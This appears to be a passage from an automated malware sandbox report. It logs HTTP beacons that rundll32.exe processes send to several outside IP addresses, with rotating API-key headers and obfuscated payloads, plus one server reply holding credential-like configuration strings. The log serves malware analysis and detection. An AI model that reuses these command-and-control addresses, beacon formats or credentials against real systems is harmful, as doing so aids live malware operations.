    Jul 15, 2024 12:52:47.429224968 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: HSGVVxiM
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    46 | 192.168.2.5 | 49761 | 195.2.70.38 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:48.358725071 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: higpnnJi
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    47 | 192.168.2.5 | 49762 | 91.142.74.28 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:49.186743021 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 3Xrnh7bV
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    48 | 192.168.2.5 | 49763 | 91.142.74.28 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:50.108691931 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ea4Tiyie
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    49 | 192.168.2.5 | 49764 | 77.238.224.56 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:50.920933962 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: NGKv3Ksp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    50 | 192.168.2.5 | 49765 | 77.238.224.56 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:51.852854013 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: rX9IcSF1
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    51 | 192.168.2.5 | 49766 | 77.238.229.63 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:52.571376085 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: GqPmqxNR
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    52 | 192.168.2.5 | 49767 | 77.238.229.63 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:53.491560936 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: EgXclkc4
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    53 | 192.168.2.5 | 49768 | 77.238.250.123 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:54.197122097 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: mXuQb0Xk
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:55.587429047 CEST | 548 | IN | HTTP/1.1 200 OK
    Date: Mon, 15 Jul 2024 10:52:55 GMT
    Content-Length: 430
    Content-Type: text/plain; charset=utf-8
    Data Raw: 31 38 35 2e 32 33 31 2e 31 35 35 2e 32 33 34 3b 32 30 35 32 39 3b 68 41 30 56 74 73 4a 6a 74 31 6d 77 70 38 75 4b 3a 57 37 65 2f 50 30 6e 2f 30 79 54 31 46 41 4f 39 6d 53 30 35 68 58 31 2e 49 35 5a 32 38 33 34 2e 59 4a 4b 37 56 46 31 30 65 62 49 2e 46 55 4f 33 5a 47 75 38 46 77 5a 2c 47 32 58 68 33 36 4f 74 71 76 54 74 6d 4e 75 70 42 52 32 3a 46 55 44 2f 56 5a 55 2f 31 38 71 39 6b 69 64 31 57 6c 55 2e 44 6b 68 31 73 79 36 34 74 4e 65 32 4e 39 44 2e 6a 74 33 37 4e 59 74 34 36 54 63 2e 30 75 73 32 4c 37 6a 38 4d 34 6e 2c 66 63 34 68 35 58 45 74 4d 4a 42 74 58 72 4f 70 58 73 76 3a 31 74 4f 2f 50 30 48 2f 4f 66 61 37 6a 6d 57 37 62 55 77 2e 42 5a 32 32 45 49 51 33 6a 50 53 38 45 37 33 2e 32 77 37 32 47 54 55 32 54 59 62 34 4e 4a 42 2e 6a 71 52 35 6c 67 44 36 6b 58 35 2c 46 78 74 68 52 45 45 74 37 37 6b 74 35 6c 56 70 6a 6d 65 3a 7a 43 30 2f 6a 51 6a 2f 44 61 5a 37 4b 6e 69 37 4a 41 6a 2e 32 61 47 32 63 42 4e 33 32 41 50 38 70 6e 52 2e 4f 58 35 32 4d 72 62 32 72 58 6b 39 6d 6a 6d 2e 35 7a 59 36 62 78 57 [TRUNCATED]
    Data Ascii: 185.231.155.234;20529;hA0VtsJjt1mwp8uK:W7e/P0n/0yT1FAO9mS05hX1.I5Z2834.YJK7VF10ebI.FUO3ZGu8FwZ,G2Xh36OtqvTtmNupBR2:FUD/VZU/18q9kid1WlU.Dkh1sy64tNe2N9D.jt37NYt46Tc.0us2L7j8M4n,fc4h5XEtMJBtXrOpXsv:1tO/P0H/Ofa7jmW7bUw.BZ22EIQ3jPS8E73.2w72GTU2TYb4NJB.jqR5lgD6kX5,FxthREEt77kt5lVpjme:zC0/jQj/DaZ7Kni7JAj.2aG2cBN32AP8pnR.OX52Mrb2rXk9mjm.5zY6bxW3fx0,iyRhpIGtuidttiCpaby:2Jb/IFE/vyq79t57dYp.wLP23QM3Tlc8CSP.3zy2zjG535H0vwC.JtX1R8p2jn03uCR
    Jul 15, 2024 12:53:25.594650030 CEST | 6 | OUT | Data Raw: 00
    Data Ascii:
    Jul 15, 2024 12:53:55.603470087 CEST | 6 | OUT | Data Raw: 00
    Data Ascii:


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    54 | 192.168.2.5 | 49769 | 77.238.250.123 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:55.114023924 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 9PtS8V5T
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:52:55.710138083 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:52:55 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    55 | 192.168.2.5 | 49771 | 195.2.70.38 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:56.283332109 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: NmInWh8x
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    56 | 192.168.2.5 | 49772 | 91.142.74.28 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:58.038038015 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Rw0gBNX8
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    57 | 192.168.2.5 | 49773 | 77.238.224.56 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:52:59.764374018 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 0lFI41j9
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    58 | 192.168.2.5 | 49774 | 77.238.229.63 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:53:01.395051003 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: UxxjFR5w
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    59 | 192.168.2.5 | 49775 | 77.238.250.123 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:53:03.051862955 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 5X20ayYU
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:53:03.645287991 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:53:03 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    60 | 192.168.2.5 | 49776 | 195.2.70.38 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:53:25.727612972 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: QnqsiWp8
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    61          192.168.2.5  49777        91.142.74.28    80                1216  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:27.489494085 CEST  294                OUT        POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 6Y2mFaMf
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    62          192.168.2.5  49778        77.238.224.56   80                1216  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:29.253784895 CEST  295                OUT        POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: I0P0FS8J
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    63          192.168.2.5  49779        77.238.229.63   80                1216  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:30.883075953 CEST  295                OUT        POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: PEnFMkLT
    Accept-Encoding: gzip
